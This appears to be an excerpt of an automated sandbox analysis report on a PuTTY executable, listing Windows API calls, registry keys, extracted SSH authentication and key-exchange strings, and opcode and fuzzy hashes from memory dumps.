                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: BUTTON
                            • API String ID: 3850602802-3405671355
                            • Opcode ID: 60eb6f9bf705cbda3e92b9764ff72399988e481c5efb0451e521e4d3bfe5e29c
                            • Instruction ID: a8bf25ec533c634574c1c5cb0ff8392c172785704ddbb9cf6244cb2ecae27a7a
                            • Opcode Fuzzy Hash: 60eb6f9bf705cbda3e92b9764ff72399988e481c5efb0451e521e4d3bfe5e29c
                            • Instruction Fuzzy Hash: A701B1B2900214ABCF01DF99DC89A9BBBB8FF09710F004455FD04AB201D3B59A50CBD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegOpenKeyA.ADVAPI32(80000001,Software\SimonTatham\PuTTY\Sessions,?), ref: 00449A97
                            Strings
                            • Software\SimonTatham\PuTTY\Sessions, xrefs: 00449A8D
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Open
                            • String ID: Software\SimonTatham\PuTTY\Sessions
                            • API String ID: 71445658-490553574
                            • Opcode ID: f2d454eaa4a4e207f7131034712221743df05d3dafba3a1bf862721c257787a2
                            • Instruction ID: d7e30ddfd2c8cd2038b7680860c7a3b3b8af214bf290fc1166bdfb7b4db984cc
                            • Opcode Fuzzy Hash: f2d454eaa4a4e207f7131034712221743df05d3dafba3a1bf862721c257787a2
                            • Instruction Fuzzy Hash: 90E08632304304AFF7059B519C06F5737D8DB00715F20407AA605E61C2EBB5D90496A8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 0040B40A: _strcat.LIBCMT ref: 0040B457
                            • GetSystemDirectoryA.KERNEL32(00000000), ref: 004464E6
                            • LoadLibraryA.KERNELBASE(00000000), ref: 0044650C
                            Similarity
                            • API ID: DirectoryLibraryLoadSystem_strcat
                            • String ID:
                            • API String ID: 2050214517-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,0044F1F2,00000000,?,00470420,00000060), ref: 00451AB2
                              • Part of subcall function 00451AF2: HeapAlloc.KERNEL32(00000000,00000140,00451ADA,000003F8,?,00470420,00000060), ref: 00451AFF
                            • HeapDestroy.KERNEL32(?,00470420,00000060), ref: 00451AE5
                            Similarity
                            • API ID: Heap$AllocCreateDestroy
                            • String ID:
                            • API String ID: 2236781399-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Similarity
                            • API ID: _strcat_strlen
                            • String ID:
                            • API String ID: 432593777-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00451816,00000000,0044E219,000000E0,0044E244,00451816,00451816), ref: 0044E201
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • WSAStartup.WS2_32(?,004769F0), ref: 004468CC
                            Similarity
                            • API ID: Startup
                            • String ID:
                            • API String ID: 724789610-0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • )., xrefs: 00416911
                            • TIS challenge packet was badly formed, xrefs: 00416288
                            • Public key packet not received, xrefs: 00415544
                            • SSH-1 public key packet stopped before random cookie, xrefs: 0041557D
                            • Received public keys, xrefs: 0041554E
                            • Pageant's response not accepted, xrefs: 004161C8
                            • , xrefs: 004155DB
                            • Pageant key list packet was truncated, xrefs: 004166A1
                            • Received TIS challenge, xrefs: 00416295
                            • Authenticated using RSA key ", xrefs: 00416194
                            • SSH-1 public key encryptions failed due to bad formatting, xrefs: 0041580D
                            • Pageant key #%d matches configured key file, xrefs: 004166BB
                            • login as: , xrefs: 00415B14
                            • \{E, xrefs: 004158B0
                            • 0 && "unexpected return from loadrsakey()", xrefs: 00416893
                            • Failed to get reply from Pageant, xrefs: 004166FE
                            • SSH password, xrefs: 00416B0A
                            • Pageant has %d SSH-1 keys, xrefs: 00416593
                            • Requested TIS authentication, xrefs: 0041695F
                            • Using CryptoCard authentication.%s%s, xrefs: 00416AAC
                            • Access denied, xrefs: 004163ED
                            • Response: , xrefs: 00416304, 00416A88
                            • Pageant failed to answer challenge, xrefs: 00415FA7
                            • Key refused, xrefs: 00415B76
                            • " from agent, xrefs: 004161B1
                            • cipher, xrefs: 00415912
                            • CryptoCard challenge packet was badly formed, xrefs: 004169EF
                            • SSH TIS authentication, xrefs: 004162AE
                            • CryptoCard authentication refused., xrefs: 0041647D
                            • Wrong passphrase., xrefs: 00416877
                            • No passphrase required., xrefs: 0041678B
                            • yRB, xrefs: 004159D5
                            • SSH CryptoCard authentication, xrefs: 00416A2B
                            • Pageant is running. Requesting keys., xrefs: 004164DE
                            • AES not supported in SSH-1, skipping, xrefs: 00415873
                            • Using TIS authentication.%s%s, xrefs: 00416328
                            • Server refused our public key., xrefs: 0041604C
                            • Host key fingerprint is:, xrefs: 004155C8
                            • Trying public key authentication., xrefs: 00416737
                            • Server violates SSH-1 protocol by not supporting 3DES encryption, xrefs: 004158E2
                            • %.*s, xrefs: 004162E8, 004162FA, 00416A6C, 00416A7E
                            • Trying to enable encryption..., xrefs: 004159A8
                            • Received CryptoCard challenge, xrefs: 00416A12
                            • Trying Pageant key #%d, xrefs: 004166D3
                            • Unexpected data from server while waiting for agent response, xrefs: 00415F41
                            • TIS authentication declined, xrefs: 00416240
                            • Authentication refused, xrefs: 004163FA
                            • Unexpected data from server while waiting for user response, xrefs: 00415494
                            • [RB, xrefs: 004159DC
                            • TIS authentication refused., xrefs: 0041625B
                            • Encryption not successfully enabled, xrefs: 00415AA4
                            • Pageant reported negative key count %d, xrefs: 0041657A
                            • Pageant's response accepted, xrefs: 00416179
                            • User aborted at cipher warning, xrefs: 004154D8
                            • No reply received from Pageant, xrefs: 00415FC5
                            • Encrypted session key, xrefs: 0041581F
                            • pwlen >= bottom && pwlen <= top, xrefs: 00416BD6
                            • Unable to authenticate, xrefs: 004168C6
                            • Failed to read SSH-1 public keys from public key packet, xrefs: 00415A82
                            • Using single-DES encryption, xrefs: 0041595E
                            • Trying public key "%s", xrefs: 0041675E
                            • Successfully started encryption, xrefs: 00415ABA
                            • Sent username "%s", xrefs: 00415EE9
                            • Sending length-padded password, xrefs: 00416CDD
                            • Reading private key file "%.150s", xrefs: 00415D61
                            • SSH-1 public keys were badly formatted, xrefs: 00415A78
                            • User aborted at host key verification, xrefs: 00415529
                            • gvE, xrefs: 004162D2
                            • Sending Pageant's response, xrefs: 00415F77
                            • Unable to load private key file "%.150s" (%s), xrefs: 00415DDC
                            • Sending password with camouflage packets, xrefs: 00416C5D
                            • Failed to authenticate with our public key., xrefs: 0041601F
                            • No supported authentication methods available, xrefs: 00416AEE
                            • Unexpected data from server while waiting for user host key response, xrefs: 004154F7
                            • Bizarre response to RSA authentication response, xrefs: 0041602F
                            • Using 3DES encryption, xrefs: 00415957
                            • Initialised %s encryption, xrefs: 004159FA
                            • Bizarre response to offer of public key, xrefs: 00416061
                            • Server's RSA challenge was badly formatted, xrefs: 0041607A
                            • No supported ciphers found, xrefs: 004158EC
                            • gvE, xrefs: 00416A56
                            • Couldn't load private key from , xrefs: 004168E0
                            • Using Blowfish encryption, xrefs: 00415950
                            • rsa, xrefs: 0041573B
                            • Passphrase for key "%.100s": , xrefs: 004167C4
                            • Strange packet received, type %d, xrefs: 00416417
                            • CryptoCard authentication declined, xrefs: 0041646D
                            • Unable to use key file "%.150s" (%s), xrefs: 00415E2E
                            • Configured key file not in Pageant, xrefs: 00416225
                            • %s@%s's password: , xrefs: 00416B2E
                            • Received RSA challenge, xrefs: 00415B8D
                            • Unable to load private key (%s), xrefs: 00415DBE
                            • No username provided, xrefs: 00415E9D
                            • Requested CryptoCard authentication, xrefs: 0041638F
                            • Installing CRC compensation attack detector, xrefs: 00415A0A
                            • Unable to use this key file (%s), xrefs: 00415E0C
                            • Authentication successful, xrefs: 004169BD
                            • Sent password, xrefs: 00416D51
                            • ..\ssh.c, xrefs: 0041688E, 00416BD1
                            Similarity
                            • API ID:
                            • String ID: $" from agent$%.*s$%s@%s's password: $).$..\ssh.c$0 && "unexpected return from loadrsakey()"$AES not supported in SSH-1, skipping$Access denied$Authenticated using RSA key "$Authentication refused$Authentication successful$Bizarre response to RSA authentication response$Bizarre response to offer of public key$Configured key file not in Pageant$Couldn't load private key from $CryptoCard authentication declined$CryptoCard authentication refused.$CryptoCard challenge packet was badly formed$Encrypted session key$Encryption not successfully enabled$Failed to authenticate with our public key.$Failed to get reply from Pageant$Failed to read SSH-1 public keys from public key packet$Host key fingerprint is:$Initialised %s encryption$Installing CRC compensation attack detector$Key refused$No passphrase required.$No reply received from Pageant$No supported authentication methods available$No supported ciphers found$No username provided$Pageant failed to answer challenge$Pageant has %d SSH-1 keys$Pageant is running. Requesting keys.$Pageant key #%d matches configured key file$Pageant key list packet was truncated$Pageant reported negative key count %d$Pageant's response accepted$Pageant's response not accepted$Passphrase for key "%.100s": $Public key packet not received$Reading private key file "%.150s"$Received CryptoCard challenge$Received RSA challenge$Received TIS challenge$Received public keys$Requested CryptoCard authentication$Requested TIS authentication$Response: $SSH CryptoCard authentication$SSH TIS authentication$SSH password$SSH-1 public key encryptions failed due to bad formatting$SSH-1 public key packet stopped before random cookie$SSH-1 public keys were badly formatted$Sending Pageant's response$Sending length-padded password$Sending password with camouflage packets$Sent password$Sent username "%s"$Server refused our public key.$Server violates SSH-1 protocol by not supporting 3DES encryption$Server's RSA challenge was badly formatted$Strange packet received, type %d$Successfully started encryption$TIS authentication declined$TIS authentication refused.$TIS challenge packet was badly formed$Trying Pageant key #%d$Trying public key "%s"$Trying public key authentication.$Trying to enable encryption...$Unable to authenticate$Unable to load private key (%s)$Unable to load private key file "%.150s" (%s)$Unable to use key file "%.150s" (%s)$Unable to use this key file (%s)$Unexpected data from server while waiting for agent response$Unexpected data from server while waiting for user host key response$Unexpected data from server while waiting for user response$User aborted at cipher warning$User aborted at host key verification$Using 3DES encryption$Using Blowfish encryption$Using CryptoCard authentication.%s%s$Using TIS authentication.%s%s$Using single-DES encryption$Wrong passphrase.$[RB$\{E$cipher$gvE$gvE$login as: $pwlen >= bottom && pwlen <= top$rsa$yRB
                            • API String ID: 0-1584414803
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Similarity
                            • API ID: _strlen
                            • String ID: "$" from agent$%.*s$%s@%s's password: $)$..\ssh.c$Access denied$Access granted$Attempting GSSAPI authentication$Attempting keyboard-interactive authentication$Authenticating with public key "$Configured key file not in Pageant$Confirm new password: $Current password (blank for previously entered password): $Enter new password: $Failed to get reply from Pageant$Further authentication required$Further authentication required$GSSAPI authentication - bad server response$GSSAPI authentication - wrong response from server$GSSAPI authentication failed to get credentials$GSSAPI authentication initialisation failed$GSSAPI authentication initialised$GSSAPI authentication loop finished OK$GSSAPI authentication request refused$GSSAPI import name failed$GSSAPI import name failed - Bad service name$Keyboard-interactive authentication failed$New SSH password$No supported authentication methods available$No supported authentication methods available (server sent: %.*s)$No username provided$Offer of public key accepted$Offered public key$Opened main channel$Pageant failed to answer challenge$Pageant has %d SSH-2 keys$Pageant is running. Requesting keys.$Pageant key #%d matches configured key file$Pageant response contained a negative key count %d$Pageant response was truncated$Passphrase for key "%.100s": $Password authentication failed$Passwords do not match$Primary command failed; attempting fallback$Reading private key file "%.150s"$SSH password$SSH server authentication$SSH server: %.*s$Sending Pageant's response$Sent new password$Sent password$Sent public key signature$Server refused keyboard-interactive authentication$Server refused our key$Server refused our key$Server refused public-key signature despite accepting key!$Server refused public-key signature despite accepting key!$Server refused service request$Server refused to open channel$Server refused to start a shell/command$Server rejected new password$Server requested password change$Server's channel confirmation cited wrong channel$Started a shell/command$Strange packet received during authentication: type %d$Strange packet received: type %d$Trying Pageant key #%d$Unable to authenticate$Unable to load private key ($Unable to load private key (%s)$Unable to load private key file "%.150s" (%s)$Unable to use key file "%.150s" (%s)$Unable to use this key file (%s)$Unexpected data from server while waiting for agent response$Unexpected response to shell/command request: packet type %d$Using keyboard-interactive authentication.%s%.*s$Using username "%s".$Wrong passphrase$enabling delayed compression$exec$gssapi-with-mic$gvE$keyboard-interactive$login as: $main channel$none$p == sigdata_len$password$publickey$s->gsslib$s->type == AUTH_TYPE_PASSWORD$session$shell$simple@putty.projects.tartarus.org$ssh-connection$subsystem
                            • API String ID: 4218353326-358498122
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetWindowTextA.USER32(?,?), ref: 00442547
                            • SetWindowTextA.USER32(?), ref: 0044255B
                            • PostQuitMessage.USER32(00000000), ref: 004427B9
                            • CreateCaret.USER32(?), ref: 004427E8
                            • ShowCaret.USER32(?), ref: 004427F1
                            • MessageBoxA.USER32(?,Are you sure you want to close this session?,00000000,00000031), ref: 004428AC
                            • DestroyWindow.USER32(?), ref: 004428BA
                            • HideCaret.USER32(?), ref: 004428CE
                            • BeginPaint.USER32(?,?), ref: 004428DB
                            • SelectPalette.GDI32(00000000,?,00000001), ref: 004428F0
                            • RealizePalette.GDI32(00000000), ref: 004428F7
                            • CreateSolidBrush.GDI32 ref: 004429B4
                            • SelectObject.GDI32(00000000,00000000), ref: 004429BE
                            • CreatePen.GDI32(00000000,00000000), ref: 004429CD
                            • SelectObject.GDI32(00000000,00000000), ref: 004429D8
                            • IntersectClipRect.GDI32(00000000,?,?,?,?), ref: 004429EA
                            • ExcludeClipRect.GDI32(00000000,?,00000000,?,?), ref: 00442A23
                            • Rectangle.GDI32(00000000,?,?,?,?), ref: 00442A36
                            • SelectObject.GDI32(00000000,?), ref: 00442A40
                            • DeleteObject.GDI32(00000000), ref: 00442A49
                            • SelectObject.GDI32(00000000,?), ref: 00442A4F
                            • DeleteObject.GDI32(?), ref: 00442A54
                            • GetStockObject.GDI32(0000000D), ref: 00442A5E
                            • SelectObject.GDI32(00000000,00000000), ref: 00442A62
                            • GetStockObject.GDI32(00000006), ref: 00442A66
                            • SelectObject.GDI32(00000000,00000000), ref: 00442A6A
                            • EndPaint.USER32(?,?), ref: 00442A73
                            • ShowCaret.USER32(?), ref: 00442A7C
                            • DestroyCaret.USER32 ref: 00442A9E
                            • TranslateMessage.USER32(?), ref: 00442B62
                            • SendMessageA.USER32(?,00000112,00000160,?), ref: 004432A6
                            • PostMessageA.USER32(?,00000102,00000020,00000000), ref: 00443323
                              • Part of subcall function 0044018C: CreateThread.KERNEL32(00000000,00000000,00440064,00000000,?,?), ref: 004401A1
                              • Part of subcall function 004411E8: ShowWindow.USER32(00000003), ref: 00441227
                            • KillTimer.USER32(?,000004D2), ref: 004435F3
                            • GetCursorPos.USER32(?), ref: 004436B3
                            • TrackPopupMenu.USER32(00000002,?,?,00000000,?,00000000), ref: 004436CD
                            • DefWindowProcA.USER32(?,?,?,?), ref: 00443F60
                            • GetKeyboardState.USER32(?), ref: 00443FA7
                            • ScreenToClient.USER32(?,?), ref: 0044403D
                            Strings
                            Similarity
                            • API ID: Object$Select$CaretMessageWindow$Create$Show$ClipDeleteDestroyPaintPalettePostRectStockText$BeginBrushClientCursorExcludeHideIntersectKeyboardKillMenuPopupProcQuitRealizeRectangleScreenSendSolidStateThreadTimerTrackTranslate
                            • String ID: %s Exit Confirmation$----- Session restarted -----$@\G$Are you sure you want to close this session?$putty &%p:%u$putty @%s
                            • API String ID: 752142565-3373460970
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            • expected RSA public key packet from server, xrefs: 0041D4D9
                            • key-exchange algorithm, xrefs: 0041D291
                            • ssh->v2_session_id_len <= sizeof(ssh->v2_session_id), xrefs: 0041DA58
                            • Initialised %s decompression, xrefs: 0041C683
                            • ssh->scmac->len <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS, xrefs: 0041C62B
                            • Doing Diffie-Hellman group exchange, xrefs: 0041C242
                            • User aborted at cipher warning, xrefs: 0041C2DB
                            • expected key exchange group packet from server, xrefs: 0041C418
                            • (ssh->cscipher->keylen+7) / 8 <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS, xrefs: 0041DB55
                            • !s->userauth_succeeded, xrefs: 0041C765
                            • (ssh->sccipher->keylen+7) / 8 <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS, xrefs: 0041C593
                            • Couldn't agree a host key algorithm (available: %s), xrefs: 0041CE70
                            • client-to-server cipher, xrefs: 0041D2E8
                            • server-to-client cipher, xrefs: 0041C334
                            • Server bug prevents key re-exchange (%s), xrefs: 0041C790
                            • ssh->csmac->len <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS, xrefs: 0041DBF3
                            • Using Diffie-Hellman with standard group "%s", xrefs: 0041D359
                            • Server initiated key re-exchange, xrefs: 0041C734
                            • `|F, xrefs: 0041C88E
                            • Doing RSA key exchange with hash %s, xrefs: 0041D404
                            • User aborted at host key verification, xrefs: 0041D45B
                            • ssh->cscipher->blksize <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS, xrefs: 0041DBA7
                            • (null), xrefs: 0041CDDA, 0041CDDF, 0041CE6A, 0041CE6F, 0041CF4A, 0041CF4F, 0041CFFB, 0041D000
                            • yF, xrefs: 0041C958
                            • Initialised %s compression, xrefs: 0041DC4B
                            • Couldn't agree a server-to-client cipher (available: %s), xrefs: 0041D001
                            • Unexpected data from server while waiting for user host key response, xrefs: 0041D426
                            • Initiating key re-exchange (%s), xrefs: 0041C80E
                            • Initialised %.200s client->server MAC algorithm, xrefs: 0041DC2F
                            • unable to read mp-ints from incoming group packet, xrefs: 0041C462
                            • expected new-keys packet from server, xrefs: 0041C4B8
                            • User aborted at kex warning, xrefs: 0041C394
                            • sizeof(keyspace) >= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS, xrefs: 0041C540, 0041DB05
                            • Initialised %.200s server->client MAC algorithm, xrefs: 0041C667
                            • Server supports delayed compression; will try this later, xrefs: 0041D184
                            • Doing Diffie-Hellman key exchange with hash %s, xrefs: 0041D376
                            • Initialised %.200s client->server encryption, xrefs: 0041DC1E
                            • Initialised %.200s server->client encryption, xrefs: 0041C656
                            • ssh->kex->hash->hlen <= sizeof(s->exchange_hash), xrefs: 0041D8F5
                            • Couldn't agree a client-to-server cipher (available: %s), xrefs: 0041CF50
                            • expected key exchange packet from server, xrefs: 0041CCE6
                            • Host key fingerprint is:, xrefs: 0041D9DE
                            • expected key exchange reply packet from server, xrefs: 0041D737
                            • ssh->sccipher->blksize <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS, xrefs: 0041C5DF
                            • unable to parse key exchange reply packet, xrefs: 0041D79D
                            • Couldn't agree a key exchange algorithm (available: %s), xrefs: 0041CDE0
                            • Server's host key did not match the signature supplied, xrefs: 0041DC70
                            • Unexpected data from server while waiting for user response, xrefs: 0041C2A6
                            • ..\ssh.c, xrefs: 0041C53B, 0041C58E, 0041C5DA, 0041C626, 0041C760, 0041D8F0, 0041DA53, 0041DB00, 0041DB50, 0041DBA2, 0041DBEE
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID: !s->userauth_succeeded$(null)$(ssh->cscipher->keylen+7) / 8 <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS$(ssh->sccipher->keylen+7) / 8 <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS$..\ssh.c$Couldn't agree a client-to-server cipher (available: %s)$Couldn't agree a host key algorithm (available: %s)$Couldn't agree a key exchange algorithm (available: %s)$Couldn't agree a server-to-client cipher (available: %s)$Doing Diffie-Hellman group exchange$Doing Diffie-Hellman key exchange with hash %s$Doing RSA key exchange with hash %s$Host key fingerprint is:$Initialised %.200s client->server MAC algorithm$Initialised %.200s client->server encryption$Initialised %.200s server->client MAC algorithm$Initialised %.200s server->client encryption$Initialised %s compression$Initialised %s decompression$Initiating key re-exchange (%s)$Server bug prevents key re-exchange (%s)$Server initiated key re-exchange$Server supports delayed compression; will try this later$Server's host key did not match the signature supplied$Unexpected data from server while waiting for user host key response$Unexpected data from server while waiting for user response$User aborted at cipher warning$User aborted at host key verification$User aborted at kex warning$Using Diffie-Hellman with standard group "%s"$`|F$client-to-server cipher$expected RSA public key packet from server$expected key exchange group packet from server$expected key exchange packet from server$expected key exchange reply packet from server$expected new-keys packet from server$key-exchange algorithm$server-to-client cipher$sizeof(keyspace) >= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS$ssh->cscipher->blksize <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS$ssh->csmac->len <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS$ssh->kex->hash->hlen <= sizeof(s->exchange_hash)$ssh->sccipher->blksize <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS$ssh->scmac->len <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS$ssh->v2_session_id_len <= sizeof(ssh->v2_session_id)$unable to parse key exchange reply packet$unable to read mp-ints from incoming group packet$yF
                            • API String ID: 0-694999770
                            • Opcode ID: 3d46c534663a6409506d1bb1eba44ef87da18588e1e9bd5013d2724c22fe9d95
                            • Instruction ID: 5653589a9489134109554c6078f4281d632632816c86eb58b1ffd955ad9e2d68
                            • Opcode Fuzzy Hash: 3d46c534663a6409506d1bb1eba44ef87da18588e1e9bd5013d2724c22fe9d95
                            • Instruction Fuzzy Hash: 7803BC71A40205EFDB10DF64C981BDAB7B1FF08314F14806AED18AB262D779ED91CB99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0043F936
                            • GlobalAlloc.KERNEL32(00002002,?), ref: 0043F94D
                            • GlobalAlloc.KERNEL32(00002002,?), ref: 0043F95A
                            • GlobalLock.KERNEL32(?), ref: 0043F97F
                            • GlobalFree.KERNEL32(?), ref: 0043F991
                            • GlobalFree.KERNEL32(?), ref: 0043F996
                            • GlobalLock.KERNEL32(?), ref: 0043F9A0
                            • GlobalUnlock.KERNEL32(?), ref: 0043F9AC
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 0043F9D3
                            • _strlen.LIBCMT ref: 0043FA24
                            • _strlen.LIBCMT ref: 0043FB45
                            • _strcat.LIBCMT ref: 0043FB9E
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 0043FDE8
                            • _strcat.LIBCMT ref: 0043FE1D
                            • _strcat.LIBCMT ref: 0043FED3
                            • _strcat.LIBCMT ref: 0043FF4B
                            • GlobalAlloc.KERNEL32(00002002,00000003), ref: 0043FF82
                            • GlobalLock.KERNEL32(00000000), ref: 0043FF90
                            • GlobalUnlock.KERNEL32(?), ref: 0043FFA8
                            • GlobalUnlock.KERNEL32(?), ref: 0043FFC3
                            • GlobalUnlock.KERNEL32(?), ref: 0043FFC8
                            • SendMessageA.USER32(00008002,00000001,00000000), ref: 0043FFE3
                            • OpenClipboard.USER32 ref: 0043FFEB
                            • EmptyClipboard.USER32 ref: 0043FFF5
                            • SetClipboardData.USER32(0000000D,?), ref: 00440006
                            • SetClipboardData.USER32(00000001,?), ref: 0044000D
                            • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 0044001C
                            • SetClipboardData.USER32(00000000), ref: 00440023
                            • CloseClipboard.USER32 ref: 00440025
                            • GlobalFree.KERNEL32(?), ref: 00440036
                            • GlobalFree.KERNEL32(?), ref: 0044003B
                            • SendMessageA.USER32(00008002,00000000,00000000), ref: 0044004F
                            • GlobalFree.KERNEL32(?), ref: 00440053
                            • GlobalFree.KERNEL32(?), ref: 0044005D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Global$Clipboard$Free$Unlock_strcat$AllocByteCharDataLockMultiWide$MessageSend_strlen$CloseEmptyFormatOpenRegister
                            • String ID: ..\windows\window.c$Rich Text Format$\'%02x$\b $\b0 $\cf%d $\highlight%d $\par$\red%d\green%d\blue%d;$\u%d$\ul $\ulnone $tindex + multilen <= len2${\colortbl ;${\rtf1\ansi\deff0{\fonttbl\f0\fmodern %s;}\f0\fs%d${\uc%d\u%d$MG
                            • API String ID: 3225255805-1080685794
                            • Opcode ID: ca7626dbaca4f28c7a598a3bfd2967bab55823eb482658af29f889955e2a1360
                            • Instruction ID: 64dfe65eea2935fc2791380e89c423e684f693fc487b94f899ccc8a2f008ff8d
                            • Opcode Fuzzy Hash: ca7626dbaca4f28c7a598a3bfd2967bab55823eb482658af29f889955e2a1360
                            • Instruction Fuzzy Hash: 2C320171D00209AFDB21CFA4DC85BAEBBB5EF49304F24507BE805E6261E7389945CB58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\MIT\Kerberos,?), ref: 004451DC
                            • RegQueryValueExA.ADVAPI32(?,InstallDir,00000000,?,00000000,?,?,?), ref: 00445205
                            • RegQueryValueExA.ADVAPI32(?,InstallDir,00000000,?,00000000,?), ref: 0044523E
                            • LoadLibraryA.KERNEL32(00000000), ref: 0044525D
                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00445270
                            • GetProcAddress.KERNEL32(00000000,gss_delete_sec_context), ref: 0044529C
                            • GetProcAddress.KERNEL32(00000000,gss_display_status), ref: 004452A7
                            • GetProcAddress.KERNEL32(00000000,gss_get_mic), ref: 004452B2
                            • GetProcAddress.KERNEL32(00000000,gss_import_name), ref: 004452BD
                            • GetProcAddress.KERNEL32(00000000,gss_init_sec_context), ref: 004452C8
                            • GetProcAddress.KERNEL32(00000000,gss_release_buffer), ref: 004452D3
                            • GetProcAddress.KERNEL32(00000000,gss_release_cred), ref: 004452DE
                            • GetProcAddress.KERNEL32(00000000,gss_release_name), ref: 004452E9
                            • GetProcAddress.KERNEL32(00000000,AcquireCredentialsHandleA), ref: 0044532F
                            • GetProcAddress.KERNEL32(00000000,InitializeSecurityContextA), ref: 0044533C
                            • GetProcAddress.KERNEL32(00000000,FreeContextBuffer), ref: 00445349
                            • GetProcAddress.KERNEL32(00000000,FreeCredentialsHandle), ref: 00445356
                            • GetProcAddress.KERNEL32(00000000,DeleteSecurityContext), ref: 00445363
                            • GetProcAddress.KERNEL32(00000000,QueryContextAttributesA), ref: 00445370
                            • GetProcAddress.KERNEL32(00000000,MakeSignature), ref: 0044537D
                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004453A8
                            • GetProcAddress.KERNEL32(00000000,gss_delete_sec_context), ref: 004453E9
                            • GetProcAddress.KERNEL32(00000000,gss_display_status), ref: 004453F4
                            • GetProcAddress.KERNEL32(00000000,gss_get_mic), ref: 004453FF
                            • GetProcAddress.KERNEL32(00000000,gss_import_name), ref: 0044540A
                            • GetProcAddress.KERNEL32(00000000,gss_init_sec_context), ref: 00445415
                            • GetProcAddress.KERNEL32(00000000,gss_release_buffer), ref: 00445420
                            • GetProcAddress.KERNEL32(00000000,gss_release_cred), ref: 0044542B
                            • GetProcAddress.KERNEL32(00000000,gss_release_name), ref: 00445436
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmp
